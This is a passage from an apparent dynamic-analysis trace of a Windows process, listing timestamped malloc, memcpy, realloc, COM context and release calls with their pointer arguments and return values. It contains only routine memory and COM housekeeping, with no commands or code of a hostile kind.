[6]=0x0, [7]=0x46)), ppv=0xd6788feb48 | out: ppv=0xd6788feb48*=0x24adf97e528) returned 0x0 [0100.000] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.000] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788feb48 | out: ppv=0xd6788feb48*=0x24adf97e528) returned 0x0 [0100.001] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.001] GetCurrentThreadId () returned 0xcf4 [0100.001] malloc (_Size=0x48) returned 0x24ae1a7c5a0 [0100.001] memcpy (in: _Dst=0x24ae1459840, _Src=0x24adf9a6b68, _Size=0x10 | out: _Dst=0x24ae1459840) returned 0x24ae1459840 [0100.001] GetCurrentThreadId () returned 0xcf4 [0100.001] malloc (_Size=0x40) returned 0x24ae1a7c5f0 [0100.001] malloc (_Size=0x60) returned 0x24ae1a7c640 [0100.001] memcpy (in: _Dst=0x24ae1a7c690, _Src=0x24adfc6706c, _Size=0x10 | out: _Dst=0x24ae1a7c690) returned 0x24ae1a7c690 [0100.002] GetCurrentThreadId () returned 0xcf4 [0100.002] malloc (_Size=0x48) returned 0x24ae1a7c6b0 [0100.002] memcpy (in: _Dst=0x24ae1459890, _Src=0x24adf9a6928, _Size=0x10 | out: _Dst=0x24ae1459890) returned 0x24ae1459890 [0100.002] malloc (_Size=0x58) returned 0x24ae1a7c700 [0100.002] memcpy (in: _Dst=0x24ae1a7c750, _Src=0x24adfc670ac, _Size=0x8 | out: _Dst=0x24ae1a7c750) returned 0x24ae1a7c750 [0100.002] GetCurrentThreadId () returned 0xcf4 [0100.002] malloc (_Size=0x48) returned 0x24ae1a7c760 [0100.002] malloc (_Size=0x208) returned 0x24ae1a7c7b0 [0100.002] memcpy (in: _Dst=0x24ae1a7c7f8, _Src=0x24adf9a9478, _Size=0x8 | out: _Dst=0x24ae1a7c7f8) returned 0x24ae1a7c7f8 [0100.003] malloc (_Size=0x0) returned 0x24ae1a7c9c0 [0100.003] malloc (_Size=0x0) returned 0x24ae1a7c9e0 [0100.003] malloc (_Size=0x70) returned 0x24ae1a7ca00 [0100.003] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fead8 | out: ppv=0xd6788fead8*=0x24adf97e528) returned 0x0 [0100.003] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.003] malloc (_Size=0xb0) returned 0x24ae1a7ca80 [0100.003] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788feb98 | out: ppv=0xd6788feb98*=0x24adf97e528) returned 0x0 [0100.003] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.004] malloc (_Size=0xd8) returned 0x24ae1a7cb40 [0100.004] ISystemDebugEventFire:IsActive (This=0x24adf9a8d00) returned 0x1 [0100.004] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788feb60 | out: ppv=0xd6788feb60*=0x24adf97e528) returned 0x0 [0100.004] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.005] malloc (_Size=0xe08) returned 0x24ae1a7cc20 [0100.006] GetCurrentThreadId () returned 0xcf4 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7da30 [0100.006] memcpy (in: _Dst=0x24ae1a7c840, _Src=0x24ae19fc390, _Size=0x26 | out: _Dst=0x24ae1a7c840) returned 0x24ae1a7c840 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7db10 [0100.006] memcpy (in: _Dst=0x24ae1a7c8a8, _Src=0x24ae19fc3c0, _Size=0x34 | out: _Dst=0x24ae1a7c8a8) returned 0x24ae1a7c8a8 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7dbf0 [0100.006] memcpy (in: _Dst=0x24ae1a7c920, _Src=0x24ae19fc3fc, _Size=0x22 | out: _Dst=0x24ae1a7c920) returned 0x24ae1a7c920 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7dcd0 [0100.006] memcpy (in: _Dst=0x24ae1a7c988, _Src=0x24ae19fc428, _Size=0x20 | out: _Dst=0x24ae1a7c988) returned 0x24ae1a7c988 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7ddb0 [0100.006] malloc (_Size=0x408) returned 0x24ae1a7de90 [0100.006] memcpy (in: _Dst=0x24ae1a7ded8, _Src=0x24ae19fc450, _Size=0x4e | out: _Dst=0x24ae1a7ded8) returned 0x24ae1a7ded8 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7e2a0 [0100.006] memcpy (in: _Dst=0x24ae1a7df68, _Src=0x24ae19fc4a8, _Size=0x46 | out: _Dst=0x24ae1a7df68) returned 0x24ae1a7df68 [0100.006] malloc (_Size=0xd8) returned 0x24ae1a7e380 [0100.006] realloc (_Block=0x0, _Size=0xa0) returned 0x24ae1a7e460 [0100.007] memcpy (in: _Dst=0x24ae1a7dff0, _Src=0x24ae19fc4f8, _Size=0x42 | out: _Dst=0x24ae1a7dff0) returned 0x24ae1a7dff0 [0100.007] malloc (_Size=0xd8) returned 0x24ae1a7e510 [0100.007] memcpy (in: _Dst=0x24ae1a7e078, _Src=0x24ae19fc544, _Size=0x36 | out: _Dst=0x24ae1a7e078) returned 0x24ae1a7e078 [0100.007] malloc (_Size=0xd8) returned 0x24ae1a7e5f0 [0100.007] memcpy (in: _Dst=0x24ae1a7e0f0, _Src=0x24ae19fc584, _Size=0x2a | out: _Dst=0x24ae1a7e0f0) returned 0x24ae1a7e0f0 [0100.007] malloc (_Size=0xd8) returned 0x24ae1a7e6d0 [0100.007] memcpy (in: _Dst=0x24ae1a7e160, _Src=0x24ae19fc5b8, _Size=0x22 | out: _Dst=0x24ae1a7e160) returned 0x24ae1a7e160 [0100.007] malloc (_Size=0xd8) returned 0x24ae1a7e7b0 [0100.007] memcpy (in: _Dst=0x24ae1a7e1c8, _Src=0x24ae19fc5e4, _Size=0x42 | out: _Dst=0x24ae1a7e1c8) returned 0x24ae1a7e1c8 [0100.007] malloc (_Size=0xd8) returned 0x24ae1a7e890 [0100.007] memcpy (in: _Dst=0x24ae1a7e250, _Src=0x24ae19fc630, _Size=0x26 | out: _Dst=0x24ae1a7e250) returned 0x24ae1a7e250 [0100.007] malloc (_Size=0xd8) returned 0x24ae1a7e970 [0100.007] malloc (_Size=0x808) returned 0x24adfc67fd0 [0100.008] memcpy (in: _Dst=0x24adfc68018, _Src=0x24ae19fc660, _Size=0x26 | out: _Dst=0x24adfc68018) returned 0x24adfc68018 [0100.008] malloc (_Size=0xd8) returned 0x24ae1a7ea50 [0100.008] memcpy (in: _Dst=0x24adfc68080, _Src=0x24ae19fc690, _Size=0x26 | out: _Dst=0x24adfc68080) returned 0x24adfc68080 [0100.008] malloc (_Size=0xd8) returned 0x24ae1a7eb30 [0100.008] memcpy (in: _Dst=0x24adfc680e8, _Src=0x24ae19fc6c0, _Size=0x2a | out: _Dst=0x24adfc680e8) returned 0x24adfc680e8 [0100.008] malloc (_Size=0xd8) returned 0x24ae1a7ec10 [0100.008] memcpy (in: _Dst=0x24adfc68158, _Src=0x24ae19fc6f4, _Size=0x3c | out: _Dst=0x24adfc68158) returned 0x24adfc68158 [0100.008] malloc (_Size=0xd8) returned 0x24adfc69630 [0100.008] realloc (_Block=0x24ae1a7e460, _Size=0x140) returned 0x24ae1a7ecf0 [0100.008] memcpy (in: _Dst=0x24adfc681d8, _Src=0x24ae19fc738, _Size=0x2a | out: _Dst=0x24adfc681d8) returned 0x24adfc681d8 [0100.008] malloc (_Size=0xd8) returned 0x24adfc69550 [0100.008] memcpy (in: _Dst=0x24adfc68248, _Src=0x24ae19fc76c, _Size=0x3c | out: _Dst=0x24adfc68248) returned 0x24adfc68248 [0100.008] malloc (_Size=0xd8) returned 0x24adfc68ad0 [0100.008] memcpy (in: _Dst=0x24adfc682c8, _Src=0x24ae19fc7b0, _Size=0x24 | out: _Dst=0x24adfc682c8) returned 0x24adfc682c8 [0100.008] malloc (_Size=0xd8) returned 0x24adfc690f0 [0100.008] memcpy (in: _Dst=0x24adfc68330, _Src=0x24ae19fc7dc, _Size=0x40 | out: _Dst=0x24adfc68330) returned 0x24adfc68330 [0100.008] malloc (_Size=0xd8) returned 0x24adfc68bb0 [0100.009] memcpy (in: _Dst=0x24adfc683b0, _Src=0x24ae19fc824, _Size=0x2c | out: _Dst=0x24adfc683b0) returned 0x24adfc683b0 [0100.009] malloc (_Size=0xd8) returned 0x24adfc69390 [0100.009] memcpy (in: _Dst=0x24adfc68420, _Src=0x24ae19fc858, _Size=0x34 | out: _Dst=0x24adfc68420) returned 0x24adfc68420 [0100.009] malloc (_Size=0xd8) returned 0x24adfc69470 [0100.009] memcpy (in: _Dst=0x24adfc68498, _Src=0x24ae19fc894, _Size=0x28 | out: _Dst=0x24adfc68498) returned 0x24adfc68498 [0100.009] malloc (_Size=0xd8) returned 0x24adfc68830 [0100.009] memcpy (in: _Dst=0x24adfc68500, _Src=0x24ae19fc8c4, _Size=0x22 | out: _Dst=0x24adfc68500) returned 0x24adfc68500 [0100.009] malloc (_Size=0xd8) returned 0x24adfc68d70 [0100.009] memcpy (in: _Dst=0x24adfc68568, _Src=0x24ae19fc8f0, _Size=0x34 | out: _Dst=0x24adfc68568) returned 0x24adfc68568 [0100.009] malloc (_Size=0xd8) returned 0x24adfc68910 [0100.009] memcpy (in: _Dst=0x24adfc685e0, _Src=0x24ae19fc92c, _Size=0x26 | out: _Dst=0x24adfc685e0) returned 0x24adfc685e0 [0100.009] malloc (_Size=0xd8) returned 0x24adfc68c90 [0100.009] memcpy (in: _Dst=0x24adfc68648, _Src=0x24ae19fc95c, _Size=0x24 | out: _Dst=0x24adfc68648) returned 0x24adfc68648 [0100.009] malloc (_Size=0xd8) returned 0x24adfc689f0 [0100.009] memcpy (in: _Dst=0x24adfc686b0, _Src=0x24ae19fc988, _Size=0x22 | out: _Dst=0x24adfc686b0) returned 0x24adfc686b0 [0100.009] malloc (_Size=0xd8) returned 0x24adfc691d0 [0100.009] memcpy (in: _Dst=0x24adfc68718, _Src=0x24ae19fc9b4, _Size=0x36 | out: _Dst=0x24adfc68718) returned 0x24adfc68718 [0100.009] malloc (_Size=0xd8) returned 0x24adfc692b0 [0100.010] memcpy (in: _Dst=0x24adfc68790, _Src=0x24ae19fc9f4, _Size=0x3c | out: _Dst=0x24adfc68790) returned 0x24adfc68790 [0100.010] malloc (_Size=0xd8) returned 0x24adfc68e50 [0100.010] malloc (_Size=0x1008) returned 0x24adfc697f0 [0100.010] memcpy (in: _Dst=0x24adfc69838, _Src=0x24ae19fca38, _Size=0x3a | out: _Dst=0x24adfc69838) returned 0x24adfc69838 [0100.010] malloc (_Size=0xd8) returned 0x24adfc68f30 [0100.010] memcpy (in: _Dst=0x24adfc698b8, _Src=0x24ae19fca7c, _Size=0x24 | out: _Dst=0x24adfc698b8) returned 0x24adfc698b8 [0100.010] malloc (_Size=0xd8) returned 0x24adfc69010 [0100.010] memcpy (in: _Dst=0x24adfc69920, _Src=0x24ae19fcaa8, _Size=0x36 | out: _Dst=0x24adfc69920) returned 0x24adfc69920 [0100.014] memcpy (in: _Dst=0x24adfc69998, _Src=0x24ae19fcae8, _Size=0x46 | out: _Dst=0x24adfc69998) returned 0x24adfc69998 [0100.014] memcpy (in: _Dst=0x24adfc69a20, _Src=0x24ae19fcb38, _Size=0x24 | out: _Dst=0x24adfc69a20) returned 0x24adfc69a20 [0100.015] memcpy (in: _Dst=0x24adfc69a88, _Src=0x24ae19fcb64, _Size=0x2a | out: _Dst=0x24adfc69a88) returned 0x24adfc69a88 [0100.015] realloc (_Block=0x24ae1a7ecf0, _Size=0x280) returned 0x24ae1a7ecf0 [0100.015] memcpy (in: _Dst=0x24adfc69af8, _Src=0x24ae19fcb98, _Size=0x2c | out: _Dst=0x24adfc69af8) returned 0x24adfc69af8 [0100.015] memcpy (in: _Dst=0x24adfc69b68, _Src=0x24ae19fcbcc, _Size=0x3a | out: _Dst=0x24adfc69b68) returned 0x24adfc69b68 [0100.015] memcpy (in: _Dst=0x24adfc69be8, _Src=0x24ae19fcc10, _Size=0x40 | out: _Dst=0x24adfc69be8) returned 0x24adfc69be8 [0100.016] memcpy (in: _Dst=0x24adfc69c68, _Src=0x24ae19fcc58, _Size=0x3c | out: _Dst=0x24adfc69c68) returned 0x24adfc69c68 [0100.016] memcpy (in: _Dst=0x24adfc69ce8, _Src=0x24ae19fcc9c, _Size=0x42 | out: _Dst=0x24adfc69ce8) returned 0x24adfc69ce8 [0100.016] memcpy (in: _Dst=0x24adfc69d70, _Src=0x24ae19fcce8, _Size=0x40 | out: _Dst=0x24adfc69d70) returned 0x24adfc69d70 [0100.017] memcpy (in: _Dst=0x24adfc69df0, _Src=0x24ae19fcd30, _Size=0x3a | out: _Dst=0x24adfc69df0) returned 0x24adfc69df0 [0100.017] memcpy (in: _Dst=0x24adfc69e70, _Src=0x24ae19fcd74, _Size=0x24 | out: _Dst=0x24adfc69e70) returned 0x24adfc69e70 [0100.017] memcpy (in: _Dst=0x24adfc69ed8, _Src=0x24ae19fcda0, _Size=0x44 | out: _Dst=0x24adfc69ed8) returned 0x24adfc69ed8 [0100.018] memcpy (in: _Dst=0x24adfc69f60, _Src=0x24ae19fcdec, _Size=0x38 | out: _Dst=0x24adfc69f60) returned 0x24adfc69f60 [0100.018] memcpy (in: _Dst=0x24adfc69fd8, _Src=0x24ae19fce2c, _Size=0x3e | out: _Dst=0x24adfc69fd8) returned 0x24adfc69fd8 [0100.018] memcpy (in: _Dst=0x24adfc6a058, _Src=0x24ae19fce74, _Size=0x24 | out: _Dst=0x24adfc6a058) returned 0x24adfc6a058 [0100.019] memcpy (in: _Dst=0x24adfc6a0c0, _Src=0x24ae19fcea0, _Size=0x20 | out: _Dst=0x24adfc6a0c0) returned 0x24adfc6a0c0 [0100.019] memcpy (in: _Dst=0x24adfc6a120, _Src=0x24ae19fcec8, _Size=0x2c | out: _Dst=0x24adfc6a120) returned 0x24adfc6a120 [0100.019] memcpy (in: _Dst=0x24adfc6a190, _Src=0x24ae19fcefc, _Size=0x2a | out: _Dst=0x24adfc6a190) returned 0x24adfc6a190 [0100.020] memcpy (in: _Dst=0x24adfc6a200, _Src=0x24ae19fcf30, _Size=0x24 | out: _Dst=0x24adfc6a200) returned 0x24adfc6a200 [0100.020] memcpy (in: _Dst=0x24adfc6a268, _Src=0x24ae19fcf5c, _Size=0x34 | out: _Dst=0x24adfc6a268) returned 0x24adfc6a268 [0100.020] memcpy (in: _Dst=0x24adfc6a2e0, _Src=0x24ae19fcf98, _Size=0x3e | out: _Dst=0x24adfc6a2e0) returned 0x24adfc6a2e0 [0100.020] memcpy (in: _Dst=0x24adfc6a360, _Src=0x24ae19fcfe0, _Size=0x3e | out: _Dst=0x24adfc6a360) returned 0x24adfc6a360 [0100.021] memcpy (in: _Dst=0x24adfc6a3e0, _Src=0x24ae19fd028, _Size=0x24 | out: _Dst=0x24adfc6a3e0) returned 0x24adfc6a3e0 [0100.021] memcpy (in: _Dst=0x24adfc6a448, _Src=0x24ae19fd054, _Size=0x38 | out: _Dst=0x24adfc6a448) returned 0x24adfc6a448 [0100.021] memcpy (in: _Dst=0x24adfc6a4c0, _Src=0x24ae19fd094, _Size=0x20 | out: _Dst=0x24adfc6a4c0) returned 0x24adfc6a4c0 [0100.022] memcpy (in: _Dst=0x24adfc6a520, _Src=0x24ae19fd0bc, _Size=0x24 | out: _Dst=0x24adfc6a520) returned 0x24adfc6a520 [0100.022] memcpy (in: _Dst=0x24adfc6a588, _Src=0x24ae19fd0e8, _Size=0x3e | out: _Dst=0x24adfc6a588) returned 0x24adfc6a588 [0100.022] realloc (_Block=0x24ae1a7c510, _Size=0x400) returned 0x24adfc6a800 [0100.022] memcpy (in: _Dst=0x24adfc6a608, _Src=0x24ae19fd130, _Size=0x3a | out: _Dst=0x24adfc6a608) returned 0x24adfc6a608 [0100.023] memcpy (in: _Dst=0x24adfc6a688, _Src=0x24ae19fd174, _Size=0x3c | out: _Dst=0x24adfc6a688) returned 0x24adfc6a688 [0100.023] memcpy (in: _Dst=0x24adfc6a708, _Src=0x24ae19fd1b8, _Size=0x28 | out: _Dst=0x24adfc6a708) returned 0x24adfc6a708 [0100.023] memcpy (in: _Dst=0x24adfc6a770, _Src=0x24ae19fd1e8, _Size=0x42 | out: _Dst=0x24adfc6a770) returned 0x24adfc6a770 [0100.024] malloc (_Size=0x2008) returned 0x24adfc6ac10 [0100.024] memcpy (in: _Dst=0x24adfc6ac58, _Src=0x24ae19fd234, _Size=0x3e | out: _Dst=0x24adfc6ac58) returned 0x24adfc6ac58 [0100.024] memcpy (in: _Dst=0x24adfc6acd8, _Src=0x24ae19fd27c, _Size=0x3a | out: _Dst=0x24adfc6acd8) returned 0x24adfc6acd8 [0100.024] memcpy (in: _Dst=0x24adfc6ad58, _Src=0x24ae19fd2c0, _Size=0x3c | out: _Dst=0x24adfc6ad58) returned 0x24adfc6ad58 [0100.024] memcpy (in: _Dst=0x24adfc6add8, _Src=0x24ae19fd304, _Size=0x26 | out: _Dst=0x24adfc6add8) returned 0x24adfc6add8 [0100.025] memcpy (in: _Dst=0x24adfc6ae40, _Src=0x24ae19fd334, _Size=0x34 | out: _Dst=0x24adfc6ae40) returned 0x24adfc6ae40 [0100.025] memcpy (in: _Dst=0x24adfc6aeb8, _Src=0x24ae19fd370, _Size=0x34 | out: _Dst=0x24adfc6aeb8) returned 0x24adfc6aeb8 [0100.025] memcpy (in: _Dst=0x24adfc6af30, _Src=0x24ae19fd3ac, _Size=0x3c | out: _Dst=0x24adfc6af30) returned 0x24adfc6af30 [0100.025] memcpy (in: _Dst=0x24adfc6afb0, _Src=0x24ae19fd3f0, _Size=0x36 | out: _Dst=0x24adfc6afb0) returned 0x24adfc6afb0 [0100.026] memcpy (in: _Dst=0x24adfc6b028, _Src=0x24ae19fd430, _Size=0x24 | out: _Dst=0x24adfc6b028) returned 0x24adfc6b028 [0100.026] memcpy (in: _Dst=0x24adfc6b090, _Src=0x24ae19fd45c, _Size=0x36 | out: _Dst=0x24adfc6b090) returned 0x24adfc6b090 [0100.026] memcpy (in: _Dst=0x24adfc6b108, _Src=0x24ae19fd49c, _Size=0x2a | out: _Dst=0x24adfc6b108) returned 0x24adfc6b108 [0100.026] memcpy (in: _Dst=0x24adfc6b178, _Src=0x24ae19fd4d0, _Size=0x38 | out: _Dst=0x24adfc6b178) returned 0x24adfc6b178 [0100.027] realloc (_Block=0x24ae1a7ecf0, _Size=0x500) returned 0x24adfc6cc20 [0100.027] memcpy (in: _Dst=0x24adfc6b1f0, _Src=0x24ae19fd510, _Size=0x22 | out: _Dst=0x24adfc6b1f0) returned 0x24adfc6b1f0 [0100.027] memcpy (in: _Dst=0x24adfc6b258, _Src=0x24ae19fd53c, _Size=0x26 | out: _Dst=0x24adfc6b258) returned 0x24adfc6b258 [0100.027] memcpy (in: _Dst=0x24adfc6b2c0, _Src=0x24ae19fd56c, _Size=0x28 | out: _Dst=0x24adfc6b2c0) returned 0x24adfc6b2c0 [0100.028] memcpy (in: _Dst=0x24adfc6b328, _Src=0x24ae19fd59c, _Size=0x48 | out: _Dst=0x24adfc6b328) returned 0x24adfc6b328 [0100.028] memcpy (in: _Dst=0x24adfc6b3b0, _Src=0x24ae19fd5ec, _Size=0x3e | out: _Dst=0x24adfc6b3b0) returned 0x24adfc6b3b0 [0100.028] memcpy (in: _Dst=0x24adfc6b430, _Src=0x24ae19fd634, _Size=0x3c | out: _Dst=0x24adfc6b430) returned 0x24adfc6b430 [0100.028] memcpy (in: _Dst=0x24adfc6b4b0, _Src=0x24ae19fd678, _Size=0x26 | out: _Dst=0x24adfc6b4b0) returned 0x24adfc6b4b0 [0100.029] memcpy (in: _Dst=0x24adfc6b518, _Src=0x24ae19fd6a8, _Size=0x38 | out: _Dst=0x24adfc6b518) returned 0x24adfc6b518 [0100.029] memcpy (in: _Dst=0x24adfc6b590, _Src=0x24ae19fd6e8, _Size=0x26 | out: _Dst=0x24adfc6b590) returned 0x24adfc6b590 [0100.029] memcpy (in: _Dst=0x24adfc6b5f8, _Src=0x24ae19fd718, _Size=0x20 | out: _Dst=0x24adfc6b5f8) returned 0x24adfc6b5f8 [0100.029] memcpy (in: _Dst=0x24adfc6b658, _Src=0x24ae19fd740, _Size=0x3c | out: _Dst=0x24adfc6b658) returned 0x24adfc6b658 [0100.030] malloc (_Size=0x78) returned 0x24ae1a7c510 [0100.030] malloc (_Size=0x70) returned 0x24ae1a7e460 [0100.030] malloc (_Size=0x2e0) returned 0x24adfc6d130 [0100.030] malloc (_Size=0x70) returned 0x24ae1a7ecf0 [0100.030] malloc (_Size=0x2e0) returned 0x24adfc6d420 [0100.030] malloc (_Size=0x70) returned 0x24ae1a7ed70 [0100.030] malloc (_Size=0x2e0) returned 0x24adfc6d710 [0100.031] malloc (_Size=0x70) returned 0x24ae1a7edf0 [0100.031] malloc (_Size=0x2e0) returned 0x24adfc6da00 [0100.031] malloc (_Size=0x70) returned 0x24ae1a7ee70 [0100.031] malloc (_Size=0x2e0) returned 0x24adfc6dcf0 [0100.031] malloc (_Size=0x70) returned 0x24ae1a7eef0 [0100.031] malloc (_Size=0x2e0) returned 0x24adfc6dfe0 [0100.031] malloc (_Size=0x70) returned 0x24adfc6e2d0 [0100.031] malloc (_Size=0x2e0) returned 0x24adfc6e350 [0100.031] malloc (_Size=0x70) returned 0x24adfc6e640 [0100.031] malloc (_Size=0x2e0) returned 0x24adfc6e6c0 [0100.031] malloc (_Size=0xd8) returned 0x24ae145a800 [0100.033] malloc (_Size=0x70) returned 0x24adfc6e9b0 [0100.033] malloc (_Size=0xa8) returned 0x24adfc6ea30 [0100.033] malloc (_Size=0x80) returned 0x24adfc6eae0 [0100.033] malloc (_Size=0x108) returned 0x24ae1459360 [0100.033] memcpy (in: _Dst=0x24ae14593a8, _Src=0x24ae1a04890, _Size=0x10 | out: _Dst=0x24ae14593a8) returned 0x24ae14593a8 [0100.033] memcpy (in: _Dst=0x24ae14593f8, _Src=0x24ae1a048a8, _Size=0x14 | out: _Dst=0x24ae14593f8) returned 0x24ae14593f8 [0100.033] memcpy (in: _Dst=0x24ae1459450, _Src=0x24ae1a048c4, _Size=0x16 | out: _Dst=0x24ae1459450) returned 0x24ae1459450 [0100.033] malloc (_Size=0x208) returned 0x24adfc6eb70 [0100.033] memcpy (in: _Dst=0x24adfc6ebb8, _Src=0x24ae1a048e4, _Size=0x1c | out: _Dst=0x24adfc6ebb8) returned 0x24adfc6ebb8 [0100.033] memcpy (in: _Dst=0x24adfc6ec18, _Src=0x24ae1a04908, _Size=0x2a | out: _Dst=0x24adfc6ec18) returned 0x24adfc6ec18 [0100.033] memcpy (in: _Dst=0x24adfc6ec88, _Src=0x24ae1a0493c, _Size=0x16 | out: _Dst=0x24adfc6ec88) returned 0x24adfc6ec88 [0100.033] memcpy (in: _Dst=0x24adfc6ece0, _Src=0x24ae1a0495c, _Size=0x24 | out: _Dst=0x24adfc6ece0) returned 0x24adfc6ece0 [0100.033] memcpy (in: _Dst=0x24adfc6ed48, _Src=0x24ae1a04988, _Size=0x2e | out: _Dst=0x24adfc6ed48) returned 0x24adfc6ed48 [0100.033] malloc (_Size=0x408) returned 0x24ae145bfe0 [0100.033] memcpy (in: _Dst=0x24ae145c028, _Src=0x24ae1a049c0, _Size=0x2a | out: _Dst=0x24ae145c028) returned 0x24ae145c028 [0100.033] memcpy (in: _Dst=0x24ae145c098, _Src=0x24ae1a049f4, _Size=0x14 | out: _Dst=0x24ae145c098) returned 0x24ae145c098 [0100.033] realloc (_Block=0x0, _Size=0xa0) returned 0x24adfc6ed80 [0100.033] memcpy (in: _Dst=0x24ae145c0f0, _Src=0x24ae1a04a10, _Size=0x26 | out: _Dst=0x24ae145c0f0) returned 0x24ae145c0f0 [0100.033] malloc (_Size=0xd8) returned 0x24ae145b280 [0100.034] malloc (_Size=0x18) returned 0x24ae1a7e4e0 [0100.034] malloc (_Size=0xd8) returned 0x24ae145b7c0 [0100.034] malloc (_Size=0x18) returned 0x24ae1a7ef70 [0100.034] malloc (_Size=0xd8) returned 0x24ae145a020 [0100.034] malloc (_Size=0x18) returned 0x24ae1a7ef90 [0100.034] malloc (_Size=0xd8) returned 0x24ae145aaa0 [0100.034] malloc (_Size=0x18) returned 0x24ae1a7efb0 [0100.034] malloc (_Size=0xd8) returned 0x24ae145af00 [0100.034] malloc (_Size=0x18) returned 0x24adfc6ee30 [0100.034] malloc (_Size=0xd8) returned 0x24ae145b360 [0100.034] malloc (_Size=0x18) returned 0x24ae145c740 [0100.034] malloc (_Size=0x9dd8) returned 0x24ae145c800 [0100.035] malloc (_Size=0x970) returned 0x24ae14665e0 [0100.035] malloc (_Size=0x970) returned 0x24ae1466f60 [0100.035] malloc (_Size=0x970) returned 0x24ae14678e0 [0100.035] malloc (_Size=0x970) returned 0x24ae1468260 [0100.035] malloc (_Size=0x970) returned 0x24ae1468be0 [0100.036] malloc (_Size=0x970) returned 0x24ae1469560 [0100.036] malloc (_Size=0x970) returned 0x24ae1469ee0 [0100.036] malloc (_Size=0x970) returned 0x24ae146a860 [0100.036] malloc (_Size=0x970) returned 0x24ae146b1e0 [0100.036] malloc (_Size=0x70) returned 0x24adfc6ee50 [0100.036] malloc (_Size=0x2e0) returned 0x24ae146bb60 [0100.036] malloc (_Size=0x20) returned 0x24adfc6eed0 [0100.037] malloc (_Size=0x288) returned 0x24ae146be50 [0100.037] realloc (_Block=0x0, _Size=0x140) returned 0x24ae146c0e0 [0100.037] realloc (_Block=0x24adfc6eed0, _Size=0x40) returned 0x24adfc6eed0 [0100.037] realloc (_Block=0x24ae146c0e0, _Size=0x280) returned 0x24ae146c0e0 [0100.037] malloc (_Size=0x508) returned 0x24ae146c370 [0100.037] realloc (_Block=0x24adfc6eed0, _Size=0x80) returned 0x24adfc6eed0 [0100.037] realloc (_Block=0x24ae146c0e0, _Size=0x500) returned 0x24ae146c880 [0100.037] malloc (_Size=0xa08) returned 0x24ae146cd90 [0100.037] realloc (_Block=0x24adfc6eed0, _Size=0x100) returned 0x24ae146c0e0 [0100.037] realloc (_Block=0x24ae146c880, _Size=0xa00) returned 0x24ae146d7a0 [0100.038] malloc (_Size=0x1408) returned 0x24ae146e1b0 [0100.038] realloc (_Block=0x24ae146c0e0, _Size=0x200) returned 0x24ae146c0e0 [0100.038] realloc (_Block=0x24ae146d7a0, _Size=0x1400) returned 0x24ae146f5c0 [0100.038] malloc (_Size=0x2808) returned 0x24ae14709d0 [0100.038] realloc (_Block=0x24ae146c0e0, _Size=0x400) returned 0x24ae146c880 [0100.038] realloc (_Block=0x24ae146f5c0, _Size=0x2800) returned 0x24ae14731e0 [0100.038] malloc (_Size=0x4008) returned 0x24ae14759f0 [0100.038] realloc (_Block=0x24ae146c880, _Size=0x800) returned 0x24ae146d7a0 [0100.038] realloc (_Block=0x24ae14731e0, _Size=0x5000) returned 0x24ae1479a00 [0100.039] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fc910 | out: ppv=0xd6788fc910*=0x24adf97e528) returned 0x0 [0100.039] MulDiv (nNumber=0, nNumerator=100, nDenominator=902) returned 0 [0100.039] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0100.039] GetTickCount () returned 0x210d019 [0100.039] malloc (_Size=0x70) returned 0x24adfc6eed0 [0100.039] malloc (_Size=0xa8) returned 0x24ae146dfb0 [0100.039] malloc (_Size=0x80) returned 0x24ae146e060 [0100.040] malloc (_Size=0x108) returned 0x24ae14598b0 [0100.040] malloc (_Size=0xd8) returned 0x24ae145ae20 [0100.040] malloc (_Size=0x18) returned 0x24ae145c720 [0100.040] memcpy (in: _Dst=0x24ae1466488, _Src=0x24ae145c720, _Size=0x18 | out: _Dst=0x24ae1466488) returned 0x24ae1466488 [0100.040] GetTickCount () returned 0x210d019 [0100.041] GetTickCount () returned 0x210d019 [0100.041] malloc (_Size=0x70) returned 0x24adfc6ef50 [0100.041] malloc (_Size=0xa8) returned 0x24ae146e0f0 [0100.041] memcpy (in: _Dst=0x24ae1a7d140, _Src=0x24adfc6ee30, _Size=0x18 | out: _Dst=0x24ae1a7d140) returned 0x24ae1a7d140 [0100.042] memcpy (in: _Dst=0x24ae1a7cfa8, _Src=0x24ae145c720, _Size=0x18 | out: _Dst=0x24ae1a7cfa8) returned 0x24ae1a7cfa8 [0100.042] malloc (_Size=0x70) returned 0x24ae146c0e0 [0100.042] malloc (_Size=0xa8) returned 0x24ae146c160 [0100.042] malloc (_Size=0x80) returned 0x24ae146c210 [0100.042] malloc (_Size=0x108) returned 0x24ae14599c0 [0100.042] malloc (_Size=0x208) returned 0x24ae146c880 [0100.042] malloc (_Size=0xd8) returned 0x24ae145bc20 [0100.042] malloc (_Size=0x18) returned 0x24ae145c780 [0100.043] malloc (_Size=0x70) returned 0x24ae146c2a0 